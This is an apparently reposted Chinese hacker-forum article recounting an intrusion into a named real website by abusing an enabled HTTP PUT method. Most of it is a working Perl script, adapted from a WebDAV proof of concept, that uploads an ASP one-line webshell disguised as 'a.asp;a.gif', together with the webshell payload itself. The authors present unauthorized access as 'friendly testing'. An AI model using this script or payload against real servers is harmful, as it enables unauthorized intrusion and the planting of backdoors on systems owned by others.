作品发布     邀请码    设为首页  收藏 

当前位置:文章提权渗透 → 文章内容 >> 危险的传输协议致黑客站点被入侵


危险的传输协议致黑客站点被入侵

更新时间:2012-2-18 16:10:43   作者:华中帝国整理  来源:华中帝国
作者:Juliet 来自:习科信息技术 - 黑客作战营 Silic Group Hacker Army 文章整理录入:YoCo Smart 声明,此事跟我无关,参与者是小白和Dreama,非黑客作战营核心成员。友情检测而已 ...

    作者:Juliet

    来自:习科信息技术 - 黑客作战营

    Silic Group Hacker Army

    文章整理录入:YoCo Smart

    声明,此事跟我无关,参与者是小白和Dreama,非黑客作战营核心成员。友情检测而已

    目标:慧看网安

    网址:www.968hk.com

    存在问题:网站用的动易CMS,后台都改了,不从web下手。服务器下手。

    抓包,发现put。呵呵,记得以前讲过网络传输方式有两种,GET和POST,虽然忘了文章放哪里了,但是确实是讲过的。但是PUT是独立于GET和POST的另外一种交互数据的方式。服务器若是支持用PUT方式的信息传输,基本上这个服务器就是悲剧了。、

    目标网站显然是独立服务器,不过,呵呵,悲剧啊居然支持PUT。

    先测试是否能上传。

    www.968hk.com/puttest1.html

    呵呵,上传成功。悲剧即将发生

    改了一个perl脚本。内容如下:

    #!/usr/bin/perl

    # Microsoft Data Access Internet Publishing Provider DAV PoC

    # Coding by CorryL Info:corryl80@gmail.com

    # ReCoding by YoCo Smart From ::{ Silic Group Hacker Army }::

    use

    IO::Socket;

    use Getopt::Std;

    getopts(‘h:', \%args);

    if (defined($args{'h'}))

    {

    $host = $args{'h'};

    }

    print STDERR “{ Microsoft Data Access Internet Publishing Provider DAV PoC }”;

    print STDERR “[ Recoding By Silic Group. YoCo  Smart ]”;

    if (!defined($host))

    {

    Usage();

    }

    $buffer = 100000;

    $socket = new IO::Socket::INET (PeerAddr => “$host”,

    PeerPort => 80,

    Proto => 'tcp’);

    die  unless $socket;

    $req = “PUT /a.asp;a.gif HTTP/1.0”;

    $leng = “Accept-Language: en-us;q=0.5”;

    $tran = “Translate: f”;

    $con = “Content-Length:153”;

    $user = “User-Agent: Microsoft”;

    $hosting = “Host: $host”;

    $msg = '<%If request(“cmd”)<>“” And request(“path”)<>“” then Createobject(“Scri”&“pting.FileSys”&“temObject”)。CreateTextFile(server.mappath(request(“path”)))。WriteLine request(“cmd”)%>';

    $data = $req.$leng.$tran.$con.$user.$hosting.$msg;

    send ($socket,$data,0);

    print “Visit to http://$host/a.asp;a.gif and get the backdoor or webshell ”;

    close;

    sub Usage {

    print STDERR “Usage:

    -h Victim host.”;

    exit;

    }

    复制代码

    一开始准备写PHP一句话,正头疼perl和PHP同源$我不会处理。突然想起,这个网站是ASP的,直接写asp。net一句话

    上去后发现,web.config未配置。要是再put上去个web.config岂不是累死。送上去一个a.asp;a.gif

    错误500,不是404

    呵呵,传上去了,但是问题出在哪里呢?

    后来dreama传上去一个一句话,发现我的这个一句话没闭合。呵呵

    昨晚一点半,本本没电了,懒得充,直接睡觉了。貌似管理员刚刚修复了这个漏洞了。

    中午我一会去就发现整个网站403,再用perl上传,发现……额…

    站长把我ip封了。他N的,我的是固定ip,失误……呵呵

责任编辑:华中帝国        



本文引用网址: 

危险的传输协议致黑客站点被入侵的相关文章
发表评论

用户名: 查看更多评论

分 值:100分 85分 70分 55分 40分 25分 10分 0分

内 容:

         (注“”为必填内容。) 验证码: 验证码,看不清楚?请点击刷新验证码